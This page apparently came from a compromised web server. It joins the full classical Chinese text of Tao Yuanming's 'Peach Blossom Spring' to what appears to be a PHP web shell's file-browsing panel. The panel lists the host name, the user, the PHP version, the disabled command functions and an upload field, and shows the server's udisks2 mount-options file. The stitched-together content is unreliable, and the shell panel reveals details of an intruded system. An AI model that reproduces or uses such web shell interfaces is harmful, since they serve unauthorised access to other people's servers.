晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。 林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。 见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝) 既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。 南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。
|
Server : Apache System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64 User : rainic ( 1014) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system Directory : /etc/udisks2/ |
Upload File : |
# This file contains custom mount options for udisks 2.x # Typically placed at /etc/udisks2/mount_options.conf # Refer to http://storaged.org/doc/udisks2-api/latest/mount_options.html # ### Simple global overrides # [defaults] # # common options, applied to any filesystem, always merged with specific filesystem type options # defaults=ro # allow=exec,noexec,nodev,nosuid,atime,noatime,nodiratime,ro,rw,sync,dirsync,noload ### Specific filesystem type options # vfat_defaults=uid=$UID,gid=$GID,shortname=mixed,utf8=1,showexec,flush # vfat_allow=uid=$UID,gid=$GID,flush,utf8,shortname,umask,dmask,fmask,codepage,iocharset,usefree,showexec # ntfs_defaults=uid=$UID,gid=$GID,windows_names # ntfs_allow=uid=$UID,gid=$GID,umask,dmask,fmask,locale,norecover,ignore_case,windows_names,compression,nocompression,big_writes ### Matching single block device by its UUID # [/dev/disk/by-uuid/18afd8f0-0d86-4d96-8de0-5f92d2ee9800] # vfat_defaults=uid=$UID,gid=$GID,noexec # # [/dev/disk/by-label/EFI] # vfat_defaults=uid=$UID,gid=$GID,noexec,umask=111,dmask=000 ### For the reference, these are the builtin mount options: # [defaults] # allow=exec,noexec,nodev,nosuid,atime,noatime,nodiratime,ro,rw,sync,dirsync,noload # # vfat_defaults=uid=$UID,gid=$GID,shortname=mixed,utf8=1,showexec,flush # vfat_allow=uid=$UID,gid=$GID,flush,utf8,shortname,umask,dmask,fmask,codepage,iocharset,usefree,showexec # # # common options for both the native kernel driver and exfat-fuse # exfat_defaults=uid=$UID,gid=$GID,iocharset=utf8,errors=remount-ro # exfat_allow=uid=$UID,gid=$GID,dmask,errors,fmask,iocharset,namecase,umask # # ntfs_defaults=uid=$UID,gid=$GID,windows_names # ntfs_allow=uid=$UID,gid=$GID,umask,dmask,fmask,locale,norecover,ignore_case,windows_names,compression,nocompression,big_writes # # iso9660_defaults=uid=$UID,gid=$GID,iocharset=utf8,mode=0400,dmode=0500 # iso9660_allow=uid=$UID,gid=$GID,norock,nojoliet,iocharset,mode,dmode # # udf_defaults=uid=$UID,gid=$GID,iocharset=utf8 # udf_allow=uid=$UID,gid=$GID,iocharset,utf8,umask,mode,dmode,unhide,undelete # # hfsplus_defaults=uid=$UID,gid=$GID,nls=utf8 # hfsplus_allow=uid=$UID,gid=$GID,creator,type,umask,session,part,decompose,nodecompose,force,nls # # btrfs_allow=compress,compress-force,datacow,nodatacow,datasum,nodatasum,degraded,device,discard,nodiscard,subvol,subvolid,space_cache # # f2fs_allow=discard,nodiscard,compress_algorithm,compress_log_size,compress_extension,alloc_mode # # ext2_defaults=errors=remount-ro # ext2_allow=errors=remount-ro # # ext3_defaults=errors=remount-ro # ext3_allow=errors=remount-ro # # ext4_defaults=errors=remount-ro # ext4_allow=errors=remount-ro